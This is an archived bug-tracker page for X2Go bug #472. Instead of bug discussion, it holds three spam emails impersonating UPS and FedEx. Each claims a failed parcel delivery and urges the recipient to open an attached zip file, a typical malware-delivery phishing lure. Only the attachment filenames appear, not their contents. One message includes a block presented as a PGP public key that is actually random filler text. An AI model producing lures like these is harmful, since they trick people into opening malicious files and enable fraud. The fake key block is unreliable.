Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Fri, 14 Apr 2017 04:10:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to getagrip@rsj35.rhostjh.com:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Fri, 14 Apr 2017 04:10:02 GMT) Full text and rfc822 format available.

Message #82 received at 472@bugs.x2go.org (full text, mbox):

From: getagrip@rsj35.rhostjh.com
To: 472@bugs.x2go.org
Subject: We have delivery problems with your parcel #02962618
Date: Thu, 13 Apr 2017 22:05:41 -0600
[Message part 1 (text/plain, inline)]
Dear Customer,

Your parcel was successfully delivered April 12 to UPS Station, but our courier cound not contact you.

Download postal receipt attached to e-mail!

Your help is greatly appreciated,
Nelson Madden,
UPS Office Clerk.

[UPS-Delivery-Details-02962618.zip (application/zip, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Mon, 17 Apr 2017 14:45:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to parquet@parquetsangaletti.it:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Mon, 17 Apr 2017 14:45:02 GMT) Full text and rfc822 format available.

Message #87 received at 472@bugs.x2go.org (full text, mbox):

From: parquet@parquetsangaletti.it
To: 472@bugs.x2go.org
Subject: Item Delivery Notification
Date: Mon, 17 Apr 2017 14:42:16 +0000
[Message part 1 (text/plain, inline)]
Dear Customer,

Please check your package delivery details attached!

FedEx

-----BEGIN PGP PUBLIC KEY BLOCK-----

XfC2XULF0ldBiXWOeVO3Sjh3b2mec8+CE6ShqUtmjQiwqj8rgrc0Tbgh1axGyeay6z/MdurPdFHV
qGRqb6pPCa1NBYGEXVV6wWJdQ9nuAdYwPnt+FN+Uq2jpiJDBXVDKdaOoh6dmLFfyOQjh8iX5602u
uR41UaBD85mt7b5uPqYJuXc8bFSGZ32EyuuF0778rDUInQ9hW8mOnSxrDZUK75eD7UtST+s9P7yU
9OfPbFolBWqkWJjRyydEcaNE/9bc0KZoGwe4ChqwSUC9dr8YexMSagxOLHRF1xse46xuh7xnKxWR
pRKyTHN1Ln0n50bSSt9/5uWm8NcWnACL9Kc6K07BV8/pWO0TQM1NROt9ClASBXAqqaA1d1TlOMAt
Nhom1nhCrA4WePuLgtYKo5oy9Su7hQVrtXE/77u9XpUeml84dr/qNFZxXs6Wlcmvkv8cVbOLnazl
6T4XkIVtecn+omuY/0fS3q5ZfZkVHL3OQkAG72mxSSMOvQdMPzpxKX2nLAhX+AuWJSAKtHa27ndC
MZuhuptELKMr1LvPq6vn1O0TxTOTGWHfvCNCR8kdCeFrP+NunQKKKs5KZ2yX30PWWolY3Y7ZJpYs
FRbG7rtjBq8+n5CiGy7aS7WqXxXubEunTsbX9pNaTqR1RDaSw0p1wRNl1YVZlYZtsyMW2GVm7oPj
dq3+d/p8haBb/pPUYRWSH6xbp7bxJLHWvtfsPoia1zHV6dK1cPQogq0au3/wzSDeZ8+UOBbecDT8
NqN+hkQuE6YlZFR1ekYY/TrLZxjf1EHyK8shjgC17xdwvV1avDnJmi4KWlxiaSAzjSPJKUME7VdG
le5zAWAlsEsf8ksehtYIgl01ctRVtmYCt2Rx1ojH+rm/6qaaAdC7zkNNVX3BthoyE8FCxBzfumPa
m5xNY61rk5wLkrfXR0hQyW60xR4Kggz4rgs3oIjMQdQEaE3GHhDh046/QOz0CG6LSRRVfB7aH1+5
yO5XQy/oXz+MGn8rQuGpelQIsm7MSRrtwQ+sIcBNAej3402aejDTH0I1L5kkFhpNq9FDvH+bnNOb
k0UKa/s80hslvF+nZ04XNuYgdZ48JAkRfx1feM7D3WQpFAnGvy7q9ZRN9L+930YJ5dhNYTaI2Loo
3IENZo7FcKgCiRDDgC5T40Y4rAD5eZvQ00qJvUDihVvkcKlrk3T5/9GBenaHIcDhVInUSYmFNpYx
OoBHLDFSZdGUHAthjsEoUXJLWIjwuaw19oYCH9+7t+CZoDM/ieaK3PCRks6RJnS3xlzPJjT2tJpS
5ywXdjvHGAWak8zKoBfwpZ0q1ePO8QSOfuiOkwtjhA==


-----END PGP PUBLIC KEY BLOCK-----

[FedEx-Delivery-ID-Q2Z3SYCO.zip (application/zip, attachment)]

Information forwarded to x2go-dev@lists.x2go.org, X2Go Developers <x2go-dev@lists.x2go.org>:
Bug#472; Package x2goclient. (Wed, 05 Jul 2017 08:50:02 GMT) Full text and rfc822 format available.

Acknowledgement sent to digitech@e4.ehosts.com:
Extra info received and forwarded to list. Copy sent to X2Go Developers <x2go-dev@lists.x2go.org>. (Wed, 05 Jul 2017 08:50:02 GMT) Full text and rfc822 format available.

Message #92 received at 472@bugs.x2go.org (full text, mbox):

From: digitech@e4.ehosts.com
To: 472@bugs.x2go.org
Subject: We have delivery problems with your parcel #008001931
Date: Wed, 5 Jul 2017 03:25:17 -0500
[Message part 1 (text/plain, inline)]
Dear Customer,

Your item has arrived at the UPS Post Office at July 02, but the courier was unable to deliver parcel to you.

Please check the attachment for details!

Kind thoughts,
 ,
UPS Operation Manager.

[UPS-Parcel-ID-008001931.zip (application/zip, attachment)]

Send a report that this bug log contains spam.


X2Go Developers <owner@bugs.x2go.org>. Last modified: Tue Dec 11 00:55:39 2018; Machine Name: ymir.das-netzwerkteam.de

X2Go Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.